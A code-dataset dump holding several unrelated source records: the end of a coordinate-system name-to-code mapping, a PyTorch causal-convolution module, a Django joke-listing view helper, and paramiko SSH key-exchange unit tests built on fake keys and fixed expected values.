'GCS_NAD_1983_HARN_Adj_MN_St_Louis_North': 104767, 'GCS_NAD_1983_HARN_Adj_MN_St_Louis_Central': 104768, 'GCS_NAD_1983_HARN_Adj_MN_St_Louis_South': 104769, 'GCS_NAD_1983_HARN_Adj_MN_Scott': 104770, 'GCS_NAD_1983_HARN_Adj_MN_Sherburne': 104771, 'GCS_NAD_1983_HARN_Adj_MN_Sibley': 104772, 'GCS_NAD_1983_HARN_Adj_MN_Stearns': 104773, 'GCS_NAD_1983_HARN_Adj_MN_Steele': 104774, 'GCS_NAD_1983_HARN_Adj_MN_Stevens': 104775, 'GCS_NAD_1983_HARN_Adj_MN_Swift': 104776, 'GCS_NAD_1983_HARN_Adj_MN_Todd': 104777, 'GCS_NAD_1983_HARN_Adj_MN_Traverse': 104778, 'GCS_NAD_1983_HARN_Adj_MN_Wabasha': 104779, 'GCS_NAD_1983_HARN_Adj_MN_Wadena': 104780, 'GCS_NAD_1983_HARN_Adj_MN_Waseca': 104781, 'GCS_NAD_1983_HARN_Adj_MN_Watonwan': 104782, 'GCS_NAD_1983_HARN_Adj_MN_Winona': 104783, 'GCS_NAD_1983_HARN_Adj_MN_Wright': 104784, 'GCS_NAD_1983_HARN_Adj_MN_Yellow_Medicine': 104785, 'GCS_NAD_1983_HARN_Adj_WI_Adams': 104800, 'GCS_NAD_1983_HARN_Adj_WI_Ashland': 104801, 'GCS_NAD_1983_HARN_Adj_WI_Barron': 104802, 'GCS_NAD_1983_HARN_Adj_WI_Bayfield': 104803, 'GCS_NAD_1983_HARN_Adj_WI_Brown': 104804, 'GCS_NAD_1983_HARN_Adj_WI_Buffalo': 104805, 'GCS_NAD_1983_HARN_Adj_WI_Burnett': 104806, 'GCS_NAD_1983_HARN_Adj_WI_Calumet': 104807, 'GCS_NAD_1983_HARN_Adj_WI_Chippewa': 104808, 'GCS_NAD_1983_HARN_Adj_WI_Clark': 104809, 'GCS_NAD_1983_HARN_Adj_WI_Columbia': 104810, 'GCS_NAD_1983_HARN_Adj_WI_Crawford': 104811, 'GCS_NAD_1983_HARN_Adj_WI_Dane': 104812, 'GCS_NAD_1983_HARN_Adj_WI_Dodge': 104813, 'GCS_NAD_1983_HARN_Adj_WI_Door': 104814, 'GCS_NAD_1983_HARN_Adj_WI_Douglas': 104815, 'GCS_NAD_1983_HARN_Adj_WI_Dunn': 104816, 'GCS_NAD_1983_HARN_Adj_WI_EauClaire': 104817, 'GCS_NAD_1983_HARN_Adj_WI_Florence': 104818, 'GCS_NAD_1983_HARN_Adj_WI_FondduLac': 104819, 'GCS_NAD_1983_HARN_Adj_WI_Forest': 104820, 'GCS_NAD_1983_HARN_Adj_WI_Grant': 104821, 'GCS_NAD_1983_HARN_Adj_WI_Green': 104822, 'GCS_NAD_1983_HARN_Adj_WI_GreenLake': 104823, 'GCS_NAD_1983_HARN_Adj_WI_Iowa': 104824, 'GCS_NAD_1983_HARN_Adj_WI_Iron': 104825, 'GCS_NAD_1983_HARN_Adj_WI_Jackson': 104826, 'GCS_NAD_1983_HARN_Adj_WI_Jefferson': 104827, 'GCS_NAD_1983_HARN_Adj_WI_Juneau': 104828, 'GCS_NAD_1983_HARN_Adj_WI_Kenosha': 104829, 'GCS_NAD_1983_HARN_Adj_WI_Kewaunee': 104830, 'GCS_NAD_1983_HARN_Adj_WI_LaCrosse': 104831, 'GCS_NAD_1983_HARN_Adj_WI_Lafayette': 104832, 'GCS_NAD_1983_HARN_Adj_WI_Langlade': 104833, 'GCS_NAD_1983_HARN_Adj_WI_Lincoln': 104834, 'GCS_NAD_1983_HARN_Adj_WI_Manitowoc': 104835, 'GCS_NAD_1983_HARN_Adj_WI_Marathon': 104836, 'GCS_NAD_1983_HARN_Adj_WI_Marinette': 104837, 'GCS_NAD_1983_HARN_Adj_WI_Marquette': 104838, 'GCS_NAD_1983_HARN_Adj_WI_Menominee': 104839, 'GCS_NAD_1983_HARN_Adj_WI_Milwaukee': 104840, 'GCS_NAD_1983_HARN_Adj_WI_Monroe': 104841, 'GCS_NAD_1983_HARN_Adj_WI_Oconto': 104842, 'GCS_NAD_1983_HARN_Adj_WI_Oneida': 104843, 'GCS_NAD_1983_HARN_Adj_WI_Outagamie': 104844, 'GCS_NAD_1983_HARN_Adj_WI_Ozaukee': 104845, 'GCS_NAD_1983_HARN_Adj_WI_Pepin': 104846, 'GCS_NAD_1983_HARN_Adj_WI_Pierce': 104847, 'GCS_NAD_1983_HARN_Adj_WI_Polk': 104848, 'GCS_NAD_1983_HARN_Adj_WI_Portage': 104849, 'GCS_NAD_1983_HARN_Adj_WI_Price': 104850, 'GCS_NAD_1983_HARN_Adj_WI_Racine': 104851, 'GCS_NAD_1983_HARN_Adj_WI_Richland': 104852, 'GCS_NAD_1983_HARN_Adj_WI_Rock': 104853, 'GCS_NAD_1983_HARN_Adj_WI_Rusk': 104854, 'GCS_NAD_1983_HARN_Adj_WI_StCroix': 104855, 'GCS_NAD_1983_HARN_Adj_WI_Sauk': 104856, 'GCS_NAD_1983_HARN_Adj_WI_Sawyer': 104857, 'GCS_NAD_1983_HARN_Adj_WI_Shawano': 104858, 'GCS_NAD_1983_HARN_Adj_WI_Sheboygan': 104859, 'GCS_NAD_1983_HARN_Adj_WI_Taylor': 104860, 'GCS_NAD_1983_HARN_Adj_WI_Trempealeau': 104861, 'GCS_NAD_1983_HARN_Adj_WI_Vernon': 104862, 'GCS_NAD_1983_HARN_Adj_WI_Vilas': 104863, 'GCS_NAD_1983_HARN_Adj_WI_Walworth': 104864, 'GCS_NAD_1983_HARN_Adj_WI_Washburn': 104865, 'GCS_NAD_1983_HARN_Adj_WI_Washington': 104866, 'GCS_NAD_1983_HARN_Adj_WI_Waukesha': 104867, 'GCS_NAD_1983_HARN_Adj_WI_Waupaca': 104868, 'GCS_NAD_1983_HARN_Adj_WI_Waushara': 104869, 'GCS_NAD_1983_HARN_Adj_WI_Winnebago': 104870, 'GCS_NAD_1983_HARN_Adj_WI_Wood': 104871, 'GCS_Mercury_2000': 104900, 'GCS_Venus_1985': 104901, 'GCS_Venus_2000': 104902, 'GCS_Moon_2000': 104903, 'GCS_Mars_1979': 104904, 'GCS_Mars_2000': 104905, 'GCS_Deimos_2000': 104906, 'GCS_Phobos_2000': 104907, 'GCS_Jupiter_2000': 104908, 'GCS_Adrastea_2000': 104909, 'GCS_Amalthea_2000': 104910, 'GCS_Ananke_2000': 104911, 'GCS_Callisto_2000': 104912, 'GCS_Carme_2000': 104913, 'GCS_Elara_2000': 104914, 'GCS_Europa_2000': 104915, 'GCS_Ganymede_2000': 104916, 'GCS_Himalia_2000': 104917, 'GCS_Io_2000': 104918, 'GCS_Leda_2000': 104919, 'GCS_Lysithea_2000': 104920, 'GCS_Metis_2000': 104921, 'GCS_Pasiphae_2000': 104922, 'GCS_Sinope_2000': 104923, 'GCS_Thebe_2000': 104924, 'GCS_Saturn_2000': 104925, 'GCS_Atlas_2000': 104926, 'GCS_Calypso_2000': 104927, 'GCS_Dione_2000': 104928, 'GCS_Enceladus_2000': 104929, 'GCS_Epimetheus_2000': 104930, 'GCS_Helene_2000': 104931, 'GCS_Hyperion_2000': 104932, 'GCS_Iapetus_2000': 104933, 'GCS_Janus_2000': 104934, 'GCS_Mimas_2000': 104935, 'GCS_Pan_2000': 104936, 'GCS_Pandora_2000': 104937, 'GCS_Phoebe_2000': 104938, 'GCS_Prometheus_2000': 104939, 'GCS_Rhea_2000': 104940, 'GCS_Telesto_2000': 104941, 'GCS_Tethys_2000': 104942, 'GCS_Titan_2000': 104943, 'GCS_Uranus_2000': 104944, 'GCS_Ariel_2000': 104945, 'GCS_Belinda_2000': 104946, 'GCS_Bianca_2000': 104947, 'GCS_Cordelia_2000': 104948, 'GCS_Cressida_2000': 104949, 'GCS_Desdemona_2000': 104950, 'GCS_Juliet_2000': 104951, 'GCS_Miranda_2000': 104952, 'GCS_Oberon_2000': 104953, 'GCS_Ophelia_2000': 104954, 'GCS_Portia_2000': 104955, 'GCS_Puck_2000': 104956, 'GCS_Rosalind_2000': 104957, 'GCS_Titania_2000': 104958, 'GCS_Umbriel_2000': 104959, 'GCS_Neptune_2000': 104960, 'GCS_Despina_2000': 104961, 'GCS_Galatea_2000': 104962, 'GCS_Larissa_2000': 104963, 'GCS_Naiad_2000': 104964, 'GCS_Nereid_2000': 104965, 'GCS_Proteus_2000': 104966, 'GCS_Thalassa_2000': 104967, 'GCS_Triton_2000': 104968, 'GCS_Pluto_2000': 104969, 'GCS_Charon_2000': 104970 } geographic = geographic() projected = projected()
none
1
3.147694
3
neural_sp/models/modules/causal_conv.py
ishine/neural_sp
577
6627883
# Copyright 2020 Kyoto University (<NAME>) # Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0) """Dilated causal convolution.""" import logging import torch.nn as nn from neural_sp.models.modules.initialization import init_with_lecun_normal from neural_sp.models.modules.initialization import init_with_xavier_uniform logger = logging.getLogger(__name__) class CausalConv1d(nn.Module): """1D dilated causal convolution. Args: in_channels (int): input channel size out_channels (int): output channel size kernel_size (int): kernel size dilation (int): deletion rate param_init (str): parameter initialization method """ def __init__(self, in_channels, out_channels, kernel_size, dilation=1, groups=1, param_init=''): super().__init__() self.padding = (kernel_size - 1) * dilation self.conv1d = nn.Conv1d(in_channels, out_channels, kernel_size, padding=self.padding, dilation=dilation, groups=groups) if param_init == 'xavier_uniform': self.reset_parameters_xavier_uniform() elif param_init == 'lecun': self.reset_parameters_lecun() else: logger.info('Parameter initialization is skipped.') def reset_parameters_xavier_uniform(self): """Initialize parameters with Xavier uniform distribution.""" logger.info('===== Initialize %s with Xavier uniform distribution =====' % self.__class__.__name__) for n, p in self.named_parameters(): init_with_xavier_uniform(n, p) def reset_parameters_lecun(self, param_init=0.1): """Initialize parameters with lecun style..""" logger.info('===== Initialize %s with lecun style =====' % self.__class__.__name__) for n, p in self.named_parameters(): init_with_lecun_normal(n, p, param_init) def forward(self, xs): """Forward pass. Args: xs (FloatTensor): `[B, T, C_in]` Returns: xs (FloatTensor): `[B, T, C_out]` """ xs = xs.transpose(2, 1) xs = self.conv1d(xs) if self.padding != 0: xs = xs[:, :, :-self.padding] xs = xs.transpose(2, 1).contiguous() return xs
# Copyright 2020 Kyoto University (<NAME>) # Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0) """Dilated causal convolution.""" import logging import torch.nn as nn from neural_sp.models.modules.initialization import init_with_lecun_normal from neural_sp.models.modules.initialization import init_with_xavier_uniform logger = logging.getLogger(__name__) class CausalConv1d(nn.Module): """1D dilated causal convolution. Args: in_channels (int): input channel size out_channels (int): output channel size kernel_size (int): kernel size dilation (int): deletion rate param_init (str): parameter initialization method """ def __init__(self, in_channels, out_channels, kernel_size, dilation=1, groups=1, param_init=''): super().__init__() self.padding = (kernel_size - 1) * dilation self.conv1d = nn.Conv1d(in_channels, out_channels, kernel_size, padding=self.padding, dilation=dilation, groups=groups) if param_init == 'xavier_uniform': self.reset_parameters_xavier_uniform() elif param_init == 'lecun': self.reset_parameters_lecun() else: logger.info('Parameter initialization is skipped.') def reset_parameters_xavier_uniform(self): """Initialize parameters with Xavier uniform distribution.""" logger.info('===== Initialize %s with Xavier uniform distribution =====' % self.__class__.__name__) for n, p in self.named_parameters(): init_with_xavier_uniform(n, p) def reset_parameters_lecun(self, param_init=0.1): """Initialize parameters with lecun style..""" logger.info('===== Initialize %s with lecun style =====' % self.__class__.__name__) for n, p in self.named_parameters(): init_with_lecun_normal(n, p, param_init) def forward(self, xs): """Forward pass. Args: xs (FloatTensor): `[B, T, C_in]` Returns: xs (FloatTensor): `[B, T, C_out]` """ xs = xs.transpose(2, 1) xs = self.conv1d(xs) if self.padding != 0: xs = xs[:, :, :-self.padding] xs = xs.transpose(2, 1).contiguous() return xs
en
0.484195
# Copyright 2020 Kyoto University (<NAME>) # Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0) Dilated causal convolution. 1D dilated causal convolution. Args: in_channels (int): input channel size out_channels (int): output channel size kernel_size (int): kernel size dilation (int): deletion rate param_init (str): parameter initialization method Initialize parameters with Xavier uniform distribution. Initialize parameters with lecun style.. Forward pass. Args: xs (FloatTensor): `[B, T, C_in]` Returns: xs (FloatTensor): `[B, T, C_out]`
2.217309
2
autorski/extras/prepare_view.py
jchmura/suchary-django
0
6627884
from functools import reduce import operator from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage from django.db.models import Q from autorski.models import Joke def __add_pages(request, jokes): paginator = Paginator(jokes, 15) page = request.GET.get('page') try: jokes = paginator.page(page) except PageNotAnInteger: # If page is not an integer, deliver first page. jokes = paginator.page(1) except EmptyPage: # If page is out of range (e.g. 9999), deliver last page of results. jokes = paginator.page(paginator.num_pages) return jokes def __add_user(request, context): user = request.user if user.is_authenticated(): if user.first_name: name = user.first_name if user.last_name: name += ' ' + user.last_name else: name = user.username username = user.username else: name = None username = None context.update({'user_fullname': name, 'username': username}) moderator = True if user.groups.filter(name='Moderator') else False context.update({'moderator': moderator}) def all_jokes(request, pages=True): sort = request.GET.get('sort', 'date') reverse = request.GET.get('reversed', True) if reverse != 'true': reverse = True else: reverse = False context = {} jokes = Joke.objects.all() search = request.GET.get('q', '') if search.strip() != '': items = search.split() filter = reduce(operator.and_, (Q(body__icontains=x) for x in items)) jokes = jokes.filter(filter) context.update({'search': search}) jokes = sorted(jokes, key=lambda joke: joke.__getattribute__(sort), reverse=reverse) if pages: jokes = __add_pages(request, jokes) context.update({'jokes': jokes}) __add_user(request, context) return context def one_joke(request, id): joke = Joke.objects.get(pk=id) context = {'joke': joke} __add_user(request, context) return context
from functools import reduce import operator from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage from django.db.models import Q from autorski.models import Joke def __add_pages(request, jokes): paginator = Paginator(jokes, 15) page = request.GET.get('page') try: jokes = paginator.page(page) except PageNotAnInteger: # If page is not an integer, deliver first page. jokes = paginator.page(1) except EmptyPage: # If page is out of range (e.g. 9999), deliver last page of results. jokes = paginator.page(paginator.num_pages) return jokes def __add_user(request, context): user = request.user if user.is_authenticated(): if user.first_name: name = user.first_name if user.last_name: name += ' ' + user.last_name else: name = user.username username = user.username else: name = None username = None context.update({'user_fullname': name, 'username': username}) moderator = True if user.groups.filter(name='Moderator') else False context.update({'moderator': moderator}) def all_jokes(request, pages=True): sort = request.GET.get('sort', 'date') reverse = request.GET.get('reversed', True) if reverse != 'true': reverse = True else: reverse = False context = {} jokes = Joke.objects.all() search = request.GET.get('q', '') if search.strip() != '': items = search.split() filter = reduce(operator.and_, (Q(body__icontains=x) for x in items)) jokes = jokes.filter(filter) context.update({'search': search}) jokes = sorted(jokes, key=lambda joke: joke.__getattribute__(sort), reverse=reverse) if pages: jokes = __add_pages(request, jokes) context.update({'jokes': jokes}) __add_user(request, context) return context def one_joke(request, id): joke = Joke.objects.get(pk=id) context = {'joke': joke} __add_user(request, context) return context
en
0.67353
# If page is not an integer, deliver first page. # If page is out of range (e.g. 9999), deliver last page of results.
2.34975
2
src/paramiko-master/tests/test_kex.py
zhanggen3714/zhanggen_audit
1
6627885
<reponame>zhanggen3714/zhanggen_audit # Copyright (C) 2003-2009 <NAME> <<EMAIL>> # # This file is part of paramiko. # # Paramiko is free software; you can redistribute it and/or modify it under the # terms of the GNU Lesser General Public License as published by the Free # Software Foundation; either version 2.1 of the License, or (at your option) # any later version. # # Paramiko is distributed in the hope that it will be useful, but WITHOUT ANY # WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR # A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more # details. # # You should have received a copy of the GNU Lesser General Public License # along with Paramiko; if not, write to the Free Software Foundation, Inc., # 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA. """ Some unit tests for the key exchange protocols. """ from binascii import hexlify, unhexlify import os import unittest from cryptography.hazmat.backends import default_backend from cryptography.hazmat.primitives.asymmetric import ec import paramiko.util from paramiko.kex_group1 import KexGroup1 from paramiko.kex_gex import KexGex, KexGexSHA256 from paramiko import Message from paramiko.common import byte_chr from paramiko.kex_ecdh_nist import KexNistp256 def dummy_urandom(n): return byte_chr(0xcc) * n def dummy_generate_key_pair(obj): private_key_value = ( 94761803665136558137557783047955027733968423115106677159790289642479432803037 ) public_key_numbers = ( "<KEY>" ) public_key_numbers_obj = ec.EllipticCurvePublicNumbers.from_encoded_point( ec.SECP256R1(), unhexlify(public_key_numbers) ) obj.P = ec.EllipticCurvePrivateNumbers( private_value=private_key_value, public_numbers=public_key_numbers_obj ).private_key(default_backend()) if obj.transport.server_mode: obj.Q_S = ec.EllipticCurvePublicNumbers.from_encoded_point( ec.SECP256R1(), unhexlify(public_key_numbers) ).public_key(default_backend()) return obj.Q_C = ec.EllipticCurvePublicNumbers.from_encoded_point( ec.SECP256R1(), unhexlify(public_key_numbers) ).public_key(default_backend()) class FakeKey(object): def __str__(self): return "fake-key" def asbytes(self): return b"fake-key" def sign_ssh_data(self, H): return b"fake-sig" class FakeModulusPack(object): P = ( 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF ) G = 2 def get_modulus(self, min, ask, max): return self.G, self.P class FakeTransport(object): local_version = "SSH-2.0-paramiko_1.0" remote_version = "SSH-2.0-lame" local_kex_init = "local-kex-init" remote_kex_init = "remote-kex-init" def _send_message(self, m): self._message = m def _expect_packet(self, *t): self._expect = t def _set_K_H(self, K, H): self._K = K self._H = H def _verify_key(self, host_key, sig): self._verify = (host_key, sig) def _activate_outbound(self): self._activated = True def _log(self, level, s): pass def get_server_key(self): return FakeKey() def _get_modulus_pack(self): return FakeModulusPack() class KexTest(unittest.TestCase): K = ( 14730343317708716439807310032871972459448364195094179797249681733965528989482751523943515690110179031004049109375612685505881911274101441415545039654102474376472240501616988799699744135291070488314748284283496055223852115360852283821334858541043710301057312858051901453919067023103730011648890038847384890504 ) def setUp(self): self._original_urandom = os.urandom os.urandom = dummy_urandom self._original_generate_key_pair = KexNistp256._generate_key_pair KexNistp256._generate_key_pair = dummy_generate_key_pair def tearDown(self): os.urandom = self._original_urandom KexNistp256._generate_key_pair = self._original_generate_key_pair def test_1_group1_client(self): transport = FakeTransport() transport.server_mode = False kex = KexGroup1(transport) kex.start_kex() x = ( b"1E000000807E2DDB1743F3487D6545F04F1C8476092FB912B013626AB5BCEB764257D88BBA64243B9F348DF7B41B8C814A995E00299913503456983FFB9178D3CD79EB6D55522418A8ABF65375872E55938AB99A84A0B5FC8A1ECC66A7C3766E7E0F80B7CE2C9225FC2DD683F4764244B72963BBB383F529DCF0C5D17740B8A2ADBE9208D4" ) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_group1._MSG_KEXDH_REPLY,), transport._expect ) # fake "reply" msg = Message() msg.add_string("fake-host-key") msg.add_mpint(69) msg.add_string("fake-sig") msg.rewind() kex.parse_next(paramiko.kex_group1._MSG_KEXDH_REPLY, msg) H = b"03079780F3D3AD0B3C6DB30C8D21685F367A86D2" self.assertEqual(self.K, transport._K) self.assertEqual(H, hexlify(transport._H).upper()) self.assertEqual((b"fake-host-key", b"fake-sig"), transport._verify) self.assertTrue(transport._activated) def test_2_group1_server(self): transport = FakeTransport() transport.server_mode = True kex = KexGroup1(transport) kex.start_kex() self.assertEqual( (paramiko.kex_group1._MSG_KEXDH_INIT,), transport._expect ) msg = Message() msg.add_mpint(69) msg.rewind() kex.parse_next(paramiko.kex_group1._MSG_KEXDH_INIT, msg) H = b"B16BF34DD10945EDE84E9C1EF24A14BFDC843389" x = ( b"1F0000000866616B652D6B6579000000807E2DDB1743F3487D6545F04F1C8476092FB912B013626AB5BCEB764257D88BBA64243B9F348DF7B41B8C814A995E00299913503456983FFB9178D3CD79EB<KEY>8D40000000866616B652D736967" ) self.assertEqual(self.K, transport._K) self.assertEqual(H, hexlify(transport._H).upper()) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertTrue(transport._activated) def test_3_gex_client(self): transport = FakeTransport() transport.server_mode = False kex = KexGex(transport) kex.start_kex() x = b"22000004000000080000002000" self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_gex._MSG_KEXDH_GEX_GROUP,), transport._expect ) msg = Message() msg.add_mpint(FakeModulusPack.P) msg.add_mpint(FakeModulusPack.G) msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_GROUP, msg) x = ( b"<KEY>" ) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_gex._MSG_KEXDH_GEX_REPLY,), transport._expect ) msg = Message() msg.add_string("fake-host-key") msg.add_mpint(69) msg.add_string("fake-sig") msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_REPLY, msg) H = b"A265563F2FA87F1A89BF007EE90D58BE2E4A4BD0" self.assertEqual(self.K, transport._K) self.assertEqual(H, hexlify(transport._H).upper()) self.assertEqual((b"fake-host-key", b"fake-sig"), transport._verify) self.assertTrue(transport._activated) def test_4_gex_old_client(self): transport = FakeTransport() transport.server_mode = False kex = KexGex(transport) kex.start_kex(_test_old_style=True) x = b"1E00000800" self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_gex._MSG_KEXDH_GEX_GROUP,), transport._expect ) msg = Message() msg.add_mpint(FakeModulusPack.P) msg.add_mpint(FakeModulusPack.G) msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_GROUP, msg) x = ( b"20000000807E2DDB1743F3487D6545F04F1C8476092FB912B013626AB5BCEB764257D88BBA64243B9F348DF7B41B8C814A995E00299913503456983FFB9178D3CD79EB6D55522418A8ABF65375872E55938AB99A84A0B5FC8A1ECC66A7C3766E7E0F80B7CE2C9225FC2DD683F4764244B72963BBB383F529DCF0C5D17740B8A2ADBE9208D4" ) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_gex._MSG_KEXDH_GEX_REPLY,), transport._expect ) msg = Message() msg.add_string("fake-host-key") msg.add_mpint(69) msg.add_string("fake-sig") msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_REPLY, msg) H = b"807F87B269EF7AC5EC7E75676808776A27D5864C" self.assertEqual(self.K, transport._K) self.assertEqual(H, hexlify(transport._H).upper()) self.assertEqual((b"fake-host-key", b"fake-sig"), transport._verify) self.assertTrue(transport._activated) def test_5_gex_server(self): transport = FakeTransport() transport.server_mode = True kex = KexGex(transport) kex.start_kex() self.assertEqual( ( paramiko.kex_gex._MSG_KEXDH_GEX_REQUEST, paramiko.kex_gex._MSG_KEXDH_GEX_REQUEST_OLD, ), transport._expect, ) msg = Message() msg.add_int(1024) msg.add_int(2048) msg.add_int(4096) msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_REQUEST, msg) x = ( b"1F0000008100FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF0000000102" ) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_gex._MSG_KEXDH_GEX_INIT,), transport._expect ) msg = Message() msg.add_mpint(12345) msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_INIT, msg) K = ( 67592995013596137876033460028393339951879041140378510871612128162185209509220726296697886624612526735888348020498716482757677848959420073720160491114319163078862905400020959196386947926388406687288901564192071077389283980347784184487280885335302632305026248574716290537036069329724382811853044654824945750581 ) H = b"CE754197C21BF3452863B4F44D0B3951F12516EF" x = ( b"210000000866616B652D6B6579000000807E2DDB1743F3487D6545F04F1C8476092FB912B013626AB5BCEB764257D88BBA64243B9F348DF7B41B8C814A995E00299913503456983FFB9178D3CD79EB6D55522418A8ABF65375872E55938AB99A84A0B5FC8A1ECC66A7C3766E7E0F80B7CE2C9225FC2DD683F4764244B72963BBB383F529DCF0C5D17740B8A2ADBE9208D40000000866616B652D736967" ) self.assertEqual(K, transport._K) self.assertEqual(H, hexlify(transport._H).upper()) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertTrue(transport._activated) def test_6_gex_server_with_old_client(self): transport = FakeTransport() transport.server_mode = True kex = KexGex(transport) kex.start_kex() self.assertEqual( ( paramiko.kex_gex._MSG_KEXDH_GEX_REQUEST, paramiko.kex_gex._MSG_KEXDH_GEX_REQUEST_OLD, ), transport._expect, ) msg = Message() msg.add_int(2048) msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_REQUEST_OLD, msg) x = ( b"1F0000008100FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF0000000102" ) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_gex._MSG_KEXDH_GEX_INIT,), transport._expect ) msg = Message() msg.add_mpint(12345) msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_INIT, msg) K = ( 67592995013596137876033460028393339951879041140378510871612128162185209509220726296697886624612526735888348020498716482757677848959420073720160491114319163078862905400020959196386947926388406687288901564192071077389283980347784184487280885335302632305026248574716290537036069329724382811853044654824945750581 ) H = b"B41A06B2E59043CEFC1AE16EC31F1E2D12EC455B" x = ( b"210000000866616B652D6B6579000000807E2DDB1743F3487D6545F04F1C8476092FB912B013626AB5BCEB764257D88BBA64243B9F348DF7B41B8C814A995E00299913503456983FFB9178D3CD79EB6D55522418A8ABF65375872E55938AB99A84A0B5FC8A1ECC66A7C3766E7E0F80B7CE2C9225FC2DD683F4764244B72963BBB383F529DCF0C5D17740B8A2ADBE9208D40000000866616B652D736967" ) self.assertEqual(K, transport._K) self.assertEqual(H, hexlify(transport._H).upper()) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertTrue(transport._activated) def test_7_gex_sha256_client(self): transport = FakeTransport() transport.server_mode = False kex = KexGexSHA256(transport) kex.start_kex() x = b"22000004000000080000002000" self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_gex._MSG_KEXDH_GEX_GROUP,), transport._expect ) msg = Message() msg.add_mpint(FakeModulusPack.P) msg.add_mpint(FakeModulusPack.G) msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_GROUP, msg) x = ( b"20000000807E2DDB1743F3487D6545F04F1C8476092FB912B013626AB5BCEB764257D88BBA64243B9F348DF7B41B8C814A995E00299913503456983FFB9178D3CD79EB6D55522418A8ABF65375872E55938AB99A84A0B5FC8A1ECC66A7C3766E7E0F80B7CE2C9225FC2DD683F4764244B72963BBB383F529DCF0C5D17740B8A2ADBE9208D4" ) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_gex._MSG_KEXDH_GEX_REPLY,), transport._expect ) msg = Message() msg.add_string("fake-host-key") msg.add_mpint(69) msg.add_string("fake-sig") msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_REPLY, msg) H = b"AD1A9365A67B4496F05594AD1BF656E3CDA0851289A4C1AFF549FEAE50896DF4" self.assertEqual(self.K, transport._K) self.assertEqual(H, hexlify(transport._H).upper()) self.assertEqual((b"fake-host-key", b"fake-sig"), transport._verify) self.assertTrue(transport._activated) def test_8_gex_sha256_old_client(self): transport = FakeTransport() transport.server_mode = False kex = KexGexSHA256(transport) kex.start_kex(_test_old_style=True) x = b"1E00000800" self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_gex._MSG_KEXDH_GEX_GROUP,), transport._expect ) msg = Message() msg.add_mpint(FakeModulusPack.P) msg.add_mpint(FakeModulusPack.G) msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_GROUP, msg) x = ( b"20000000807E2DDB1743F3487D6545F04F1C8476092FB912B013626AB5BCEB764257D88BBA64243B9F348DF7B41B8C814A995E00299913503456983FFB9178D3CD79EB6D55522418A8ABF65375872E55938AB99A84A0B5FC8A1ECC66A7C3766E7E0F80B7CE2C9225FC2DD683F4764244B72963BBB383F529DCF0C5D17740B8A2ADBE9208D4" ) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_gex._MSG_KEXDH_GEX_REPLY,), transport._expect ) msg = Message() msg.add_string("fake-host-key") msg.add_mpint(69) msg.add_string("fake-sig") msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_REPLY, msg) H = b"518386608B15891AE5237DEE08DCADDE76A0BCEFCE7F6DB3AD66BC41D256DFE5" self.assertEqual(self.K, transport._K) self.assertEqual(H, hexlify(transport._H).upper()) self.assertEqual((b"fake-host-key", b"fake-sig"), transport._verify) self.assertTrue(transport._activated) def test_9_gex_sha256_server(self): transport = FakeTransport() transport.server_mode = True kex = KexGexSHA256(transport) kex.start_kex() self.assertEqual( ( paramiko.kex_gex._MSG_KEXDH_GEX_REQUEST, 